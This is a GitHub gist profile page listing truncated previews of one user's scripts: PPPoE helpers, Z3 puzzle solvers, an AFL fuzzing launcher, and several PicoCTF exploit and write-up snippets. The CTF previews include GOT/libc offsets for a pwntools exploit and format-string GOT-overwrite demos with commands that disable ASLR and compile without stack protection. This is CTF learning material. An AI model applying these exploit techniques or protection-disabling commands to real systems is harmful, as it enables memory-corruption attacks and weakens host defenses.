Skip to content

Instantly share code, notes, and snippets.

View shahril96's full-sized avatar
🐢

Mohd Shahril shahril96

🐢
160 followers · 169 following
  • Kedah, Malaysia
View GitHub Profile
@shahril96
shahril96 / tmpunk-helper.py
Last active June 24, 2017 03:49
Script to make my daily routine task...well...not routine anymore. (intended to be run inside Arch Linux)
import os
import sys
import re
import subprocess
import time
PPPD_WAITTIMEOUT = 10
#####################################
@shahril96
shahril96 / pppoeconf.py
Last active June 23, 2017 23:47
My own version of simple pppoeconf (intended to be used inside Arch Linux)
import os
import sys
import re
import subprocess
import pprint
def papsecret(username, password):
papfile = """\r# Secrets for authentication using PAP
@shahril96
shahril96 / z3_prime.py
Last active June 25, 2021 00:16
Generating list of valid prime numbers using Z3 theorem prover
'''
Using Z3 to check if the number is prime
Original reference: https://stackoverflow.com/a/35653749/1768052
'''
from z3 import *
def isPrime(x):
y, z = Ints("y z")
@shahril96
shahril96 / garden_puzzle_z3.py
Created May 28, 2017 23:41
Using Z3 Theorem Solver to solve for Gardens Puzzle
import sys
import itertools
from z3 import *
#
# Original puzzle
#
'''
Five friends have their gardens next to one another, where they grow three kinds of crops:
@shahril96
shahril96 / run-fuzzer.sh
Last active January 30, 2018 17:47
Bash script to simplify the running of the AFL (American Fuzzy Loop)
#
# README
#
# Bash script to simplify the running of the AFL (American Fuzzy Loop)
#
# It will:
# - use AFL_HARDEN=1 to detect simple memory corruption
# - use libdislocator to detect HEAP memory corruption
# - use multi-thread AFL with tmux 4-panes splitted to ease viewing
@shahril96
shahril96 / matrix.py
Last active July 13, 2023 14:31
Exploit for PicoCTF's Enter the Matrix challenge.
from pwn import *
import struct
import binascii
FREE_GOT = 0x804a10c
SETBUF_GOT = 0x804a104
FREE_LIBC = 0x76110 # pico: 0x76110, local: 0x712f0
SYSTEM_LIBC = 0x3e3e0 # pico: 0x3e3e0, local: 0x3ada0
@shahril96
shahril96 / pico_consoleconfig.py
Created May 10, 2017 10:16
Python write-ups for PicoCTF 2017's Console Config format string vulnerability challenge.
'''
Greetz @_py on 0x00sec.org forum!
Without his awesome write-ups (link below), I won't be able to understand and finish this challenge.
Link: https://0x00sec.org/t/picoctf-write-up-bypassing-aslr-via-format-string-bug/1920
'''
@shahril96
shahril96 / format_string_got.c
Last active November 26, 2021 03:17
A demonstration on how to overwrite GOT (Global Offset Table) table entry using format string vulnerability.
/*
DISABLE ASLR & NX THROUGH COMPILATION:
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space # disable ASLR
$ gcc -fno-stack-protector -z execstack -o format_string format_string.c -g # compile with NX (DEP protection) disabled
#############
# CODE POC
#############
@shahril96
shahril96 / format_string.c
Last active May 2, 2017 07:19
A demonstration on how to write into arbitrary addresses using format string vulnerability
/*
* disable ASLR & compile:
* $ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space # disable ASLR
* $ gcc -fno-stack-protector -z execstack -o format_string format_string.c -m32 -g # compile with NX (DEP protection) disabled
*
* addresses to write:
* val = 0x804a020 (addr)
* val+2 = 0x804a022
*
@shahril96
shahril96 / keyboard_pcap.py
Last active October 31, 2019 20:18
Python solution for solving PicoCTF 2017 - Just Keyp Trying
"""
shahril:pico$ python keyboard_pcap.py -f data.pcap
flag{pr355_0nwards_a4263f07}c
"""
from scapy.all import *
from argparse import ArgumentParser
from sys import argv
from collections import OrderedDict